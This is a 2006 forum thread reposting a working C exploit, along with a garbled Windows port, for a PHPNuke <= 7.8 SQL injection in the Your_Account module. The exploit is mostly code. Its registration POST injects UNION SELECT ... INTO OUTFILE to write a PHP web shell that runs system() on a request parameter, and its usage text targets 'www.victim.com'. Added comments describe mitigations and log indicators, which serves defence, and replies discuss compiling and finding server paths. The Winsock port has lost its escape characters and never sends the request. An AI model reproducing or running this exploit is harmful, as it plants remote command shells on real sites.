/*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Critical SQL INJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of the web server
void begin(void);
void sqlinj(int sock, char *argv[]);
/*
 * Entry point of the proof-of-concept client.
 *
 * Three arguments are required (argc == 4):
 *   argv[1] - host name passed to gethostbyname()
 *   argv[2] - request path handed on to sqlinj()
 *   argv[3] - file path that sqlinj() embeds in the request body
 *
 * The function opens one TCP connection to argv[1] on PORT, lets sqlinj()
 * write a single request, then shuts the socket down and closes it. The
 * server's response is never read, so the "[OK]" status lines report only
 * local steps (socket, resolve, connect, write); they say nothing about
 * whether the contacted server was vulnerable.
 */
int main(int argc, char *argv[]){
int sock;
struct sockaddr_in addr;
struct hostent *hp=0;
/* begin() prints the usage text and calls exit(0), so it does not return. */
if(argc!=4) {
begin();
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[-] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}
printf("\n\n[+] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Resolving %s [OK]\n", argv[1]);
memset(&addr,0,sizeof(addr));
/* h_addr is the first address in the resolver's list; only that one is tried. */
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Connecting at %s [OK]\n", argv[1]);
sqlinj(sock, argv);
/* Printed unconditionally: no reply has been read at this point. */
printf("[+] Now check the shell\n"
"[+] http://%s\n\n",argv[1]);
/* 2 is the numeric value of SHUT_RDWR on Linux and the BSDs. */
shutdown(sock, 2);
close(sock);
return(0);
}
/*
 * Prints the banner and usage text, then terminates the process with exit
 * status 0. The trailing return statement is never reached.
 *
 * Reading the usage text as a defender: the third argument is an absolute
 * filesystem path on the server, and the example places it inside the
 * PHPNuke document root. The technique therefore depends on the database
 * server being able to create files in a directory from which the web
 * server executes PHP; keeping those two apart removes that step.
 */
void begin(void){
printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n"
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;
}
/*
 * Writes a single HTTP POST request to the connected socket.
 *
 *   sock - connected TCP socket; wrapped in a stdio stream with fdopen()
 *   argv - the program's argument vector: argv[1] fills the Host and
 *          Referer headers, argv[2] is the request path, argv[3] is the
 *          file path placed inside the injected SQL
 *
 * Exits the process if fdopen() fails. The stream is not closed here; the
 * caller closes the descriptor.
 *
 * What the request does, from a defender's point of view: the username
 * field of the Your_Account "new user" form carries a quote character
 * followed by a UNION SELECT ... INTO OUTFILE clause. If the application
 * places that field into its query unescaped, MySQL is asked to create a
 * file at argv[3] containing a short PHP snippet that passes the "sr"
 * request parameter to system(), i.e. a web shell.
 *
 * Conditions the technique depends on, each of which is a mitigation point:
 *   - the field reaches the query unescaped (fix: patched or upgraded
 *     PHPNuke, parameterised queries);
 *   - the MySQL account used by the application holds the FILE privilege
 *     (web application accounts normally should not);
 *   - the operating system user running mysqld can create files in a
 *     directory served as PHP (INTO OUTFILE does not overwrite existing
 *     files; later MySQL releases can confine it with secure_file_priv);
 *   - per the file header, a MySQL version newer than 4.0.
 *
 * Indicators visible in this listing: User-Agent "SecurityReason - [SR]",
 * the e-mail address securitybreak@securityreason.com, the strings
 * "INTO OUTFILE" and "SecurityReason Shell" in a registration POST body,
 * and later GET requests carrying an "sr" parameter. New .php files owned
 * by the database user under the web root are the host-side trace.
 */
void sqlinj(int sock, char *argv[]){
FILE *go;
/* Fixed base for the Content-Length header; strlen(argv[3]) is added below. */
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[-] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}
/* Unbuffered stream: the fprintf() below goes straight to the socket. */
setbuf(go,NULL);
size+=strlen(argv[3]);
/*
 * Request as written: header lines end in a bare LF, the body contains a
 * literal space in "op=new user", and a Cookie line follows the body.
 * Together with the fixed User-Agent these traits make the tool's traffic
 * straightforward to match in proxy or WAF logs and in packet captures.
 * The SQL uses empty comment sequences where spaces would normally appear.
 */
fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
/* Reports only that the write was issued; no response is read. */
printf("[+] Sending exploit [OK]\n\n");
}
Phpnuke <=7.8 Sql Injection Exploit
Started by
pita
, Feb 17 2006 06:37 AM
4 replies to this topic
#1
Posted 17 February 2006 - 06:37 AM
#2
Posted 18 February 2006 - 02:50 AM
plz compile it !!!
#3 Guest_sirh0t_*
Posted 18 February 2006 - 06:15 PM
/*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Critical SQL INJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of the web server
void begin(void);
void sqlinj(int sock, char *argv[]);
/*
 * Entry point (this listing repeats the one in the thread's first post).
 *
 * Requires argc == 4: argv[1] is the host to resolve, argv[2] and argv[3]
 * are passed through to sqlinj(). Connects once to argv[1] on PORT, has
 * sqlinj() write one request, then closes the socket. No response is read,
 * so every "[OK]" line describes a local step only.
 */
int main(int argc, char *argv[]){
int sock;
struct sockaddr_in addr;
struct hostent *hp=0;
/* begin() ends in exit(0); control does not come back here. */
if(argc!=4) {
begin();
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[-] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}
printf("\n\n[+] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Resolving %s [OK]\n", argv[1]);
memset(&addr,0,sizeof(addr));
/* Only the first resolved address (h_addr) is used. */
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Connecting at %s [OK]\n", argv[1]);
sqlinj(sock, argv);
/* Unconditional message; the outcome on the server is unknown here. */
printf("[+] Now check the shell\n"
"[+] http://%s\n\n",argv[1]);
shutdown(sock, 2);
close(sock);
return(0);
}
/*
 * Prints the banner and usage text and exits with status 0; the final
 * return statement is unreachable.
 *
 * The usage text shows that the third argument is an absolute server-side
 * path inside the web root, which is why a database account without file
 * write access to served directories is an effective control.
 */
void begin(void){
printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n"
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;
}
/*
 * Writes one HTTP POST request to the socket through a stdio stream.
 *
 *   sock - connected TCP socket
 *   argv - argv[1] host (Host and Referer headers), argv[2] request path,
 *          argv[3] file path embedded in the SQL
 *
 * Exits the process if fdopen() fails.
 *
 * The username form field carries a quote followed by a UNION SELECT ...
 * INTO OUTFILE clause whose selected value is a PHP snippet calling
 * system() on the "sr" request parameter. It has an effect only where the
 * application builds its query from the unescaped field, the application's
 * MySQL account holds the FILE privilege, and mysqld can create files in a
 * directory served as PHP. The forum reply that follows this listing
 * reports exactly that limit: no writable directory, no result.
 *
 * Log indicators present in the code: User-Agent "SecurityReason - [SR]",
 * "INTO OUTFILE" in a registration POST body, and the marker string
 * "SecurityReason Shell".
 */
void sqlinj(int sock, char *argv[]){
FILE *go;
/* Constant base for Content-Length; the length of argv[3] is added below. */
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[-] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}
/* Disable stdio buffering so the request is written immediately. */
setbuf(go,NULL);
size+=strlen(argv[3]);
fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
/* Printed after the write; the server's reply is never inspected. */
printf("[+] Sending exploit [OK]\n\n");
}it was shit for me I didnt had writable dirs btw to find local path just search site:bleeh.com error / then some strings that showed by error or just create error by ur self to see it
#4
Posted 18 February 2006 - 08:08 PM
if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
something wrong here? it compiles fine but i always get an error:
[+]Creating socket [OK]
[-] Resolving ACME://someurl.com [FAILED]
#5
Posted 19 February 2006 - 05:19 AM
/*
____ ____ __
| | | | | | | /
| | | | | |___/
| | --- | |----| |
|____| |____ | | |____| __/
Copyright (C) 2006 Untruth Labs
--------------------------------------------------------------------------------
Critical SQL Injection PHPNuke <= 7.8 - Your_Account
found by sp3x from www.securityreason.com
This exploit is based on this exploit:
http://securityreason.com/achievement_exploitalert/7
--------------------------------------------------------------------------------
recoded for windows (winsock): by unitedbr Date: 17.02.2006
Compiled in VC++
C:@PastinhaArea_de_Testescppphpnuke7.8>cl phpnuke78.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.
phpnuke78.cpp
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
/out:phpnuke78.exe
phpnuke78.obj
C:@PastinhaArea_de_Testescppphpnuke7.8>
--------------------------------------------------------------------------------
C:@PastinhaArea_de_Testescppphpnuke7.8>phpnuke78
############################################################
# Untruth Labs presents #
# #
# EXPLOIT for PHPNuke <= 7.8 #
# Original code by: sp3x - Date: 16.02.2006 #
# http://securityreason.com/achievement_exploitalert/7 #
# #
# Recoded for windows: by unitedbr #
# Date: 17.02.2006 #
############################################################
Usage :
phpnuke78 HOST /[path_phpnuke] [s_directory]
HOST - Host where is phpnuke example: localhost
[path_phpnuke] - PHPNuke directory
[s_directory] - shell directory where to upload
Example :
phpnuke78 www.victim.com /phpnuke/html/ /home/unitedbr/nuke78/html/shell.php
After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls
C:@PastinhaArea_de_Testescppphpnuke7.8>
--------------------------------------------------------------------------------
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#define PORT 80
void usage(void);
void sqlinj(SOCKET sock, char *argv[]);
/*
 * Entry point of the Winsock port.
 *
 * NOTE(review): as rendered on this page the string literals have lost
 * their backslashes (a newline shows as a bare "n", inner quotes are
 * unescaped), so the listing is not valid source as shown.
 *
 * As written here, the function starts Winsock, requires argc == 4
 * (otherwise usage() exits), creates a TCP socket, resolves argv[1],
 * connects to it on PORT, prints status lines and releases the socket.
 * No data is written to the connection by this function.
 */
int main(int argc, char *argv[])
{
int i, count;
WSADATA wsaData;
/* Winsock start up */
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
printf("[x] Error at WSAStartup()n");
exit(EXIT_FAILURE);
}
if(argc != 4)
usage();
// Create a socket.
SOCKET sock;
sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( sock == INVALID_SOCKET ) {
printf( "n[x] Creating socket error: %ld [FAILED]n", WSAGetLastError() );
WSACleanup();
exit(EXIT_FAILURE);
}
printf("n[!] Creating socket [OK]n");
struct hostent *he;
struct sockaddr_in addr;
/* get IP address of other end */
he = gethostbyname(argv[1]);
if(he == NULL)
{
printf("[x] Resolving "%s" [FAILED]n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[!] Resolving "%s" [OK]n", argv[1]);
memset(&addr, 0, sizeof(addr));
/* Only the first resolved address (h_addr) is used. */
memcpy((char*)&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
/* connecting */
if( connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR)
{
printf("[x] Connecting at %s [FAILED]n", argv[1] );
WSACleanup();
exit(EXIT_FAILURE);
}
printf("[!] Connecting at %s [OK]n", argv[1]);
/* Printed unconditionally; nothing has been read from the server. */
printf("[!] Now check the shelln"
"[!] http://%snn",argv[1]);
WSACleanup();
closesocket(sock);
return 0;
}
/*
 * Prints the banner and usage text, then exits with EXIT_SUCCESS.
 *
 * NOTE(review): the text is shown as extracted; escape backslashes are
 * missing and two string literals are wrapped across lines.
 *
 * This port names the request parameter "cmd" in its example, where the
 * banner in the file header and the original tool use "sr"; both names are
 * worth covering when searching access logs for follow-up requests.
 */
void usage(void)
{
printf("nn############################################################n"
"# Untruth Labs presents #n"
"# #n"
"# EXPLOIT for PHPNuke <= 7.8 #n"
"# Original code by: sp3x - Date: 16.02.2006 #n"
"# http://securityreason.com/achievement_exploitalert/7 #n"
"# #n"
"# Recoded for windows: by unitedbr #n"
"# Date: 17.02.2006 #n"
"############################################################nn"
" Usage : n"
" phpnuke78 HOST /[path_phpnuke] [s_directory]nn"
" HOST - Host where is phpnuke example: localhost n"
" [path_phpnuke] - PHPNuke directoryn"
" [s_directory] - shell directory where to uploadnn"
" Example :nn"
" phpnuke78 www.victim.com /phpnuke/html/ /home/unitedbr/nuke78/html/shell
.phpn"
" After this go to http://www.victim.com/phpnuke/html/shell.php?cmd=ls nn
");
exit(EXIT_SUCCESS);
}
/*
 * Winsock port of the request writer: formats one HTTP POST and writes it
 * to the socket through a stdio stream.
 *
 *   sock - connected socket
 *   argv - argv[1] host (Host and Referer headers), argv[2] request path,
 *          argv[3] file path embedded in the SQL
 *
 * Exits the process if fdopen() fails.
 *
 * NOTE(review): shown as extracted; backslashes are missing from the
 * string literals and one literal is wrapped across two lines.
 *
 * The request is the same UNION SELECT ... INTO OUTFILE injection through
 * the username field as in the original tool, and the same controls apply:
 * a patched application, no FILE privilege for the application's MySQL
 * account, and no write access for mysqld to directories served as PHP.
 *
 * Indicators that differ from the original: the e-mail address
 * unitedbr@u-labs.org, the marker string "Untruth Shell" and the request
 * parameter "cmd". The User-Agent "SecurityReason - [SR]" is unchanged.
 */
void sqlinj(SOCKET sock, char *argv[])
{
FILE *go;
/* Constant base for Content-Length; the length of argv[3] is added below. */
int size = 264;
go = fdopen(sock,"a");
if (go == 0)
{
perror("[x] fdopen [FAILED]nn");
closesocket(sock);
exit(EXIT_FAILURE);
}
setbuf(go,NULL);
size+=strlen(argv[3]);
fprintf(go,"POST %s HTTP/1.0n"
"Connection: Keep-Aliven"
"Pragma: no-cachen"
"Cache-control: no-cachen"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identityn"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5n"
"Accept-Language: enn"
"Host: %sn"
"Referer: http://%s%s?name=Your_Account&op=new usern"
"User-Agent: SecurityReason - [SR]n"
"Content-Type: application/x-www-form-urlencodedn"
"Content-Length: %dnn"
"name=Your_Account&op=new user&user_email=unitedbr@u-labs.org&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo "Untruth Shell";system($_GET[cmd]);'/**/FR
OM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*nn"
"Cookie: lang=englishrnrn",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[!] Sending exploit [OK]nn");
}For win
Source : securityreason.com/exploitalert/319












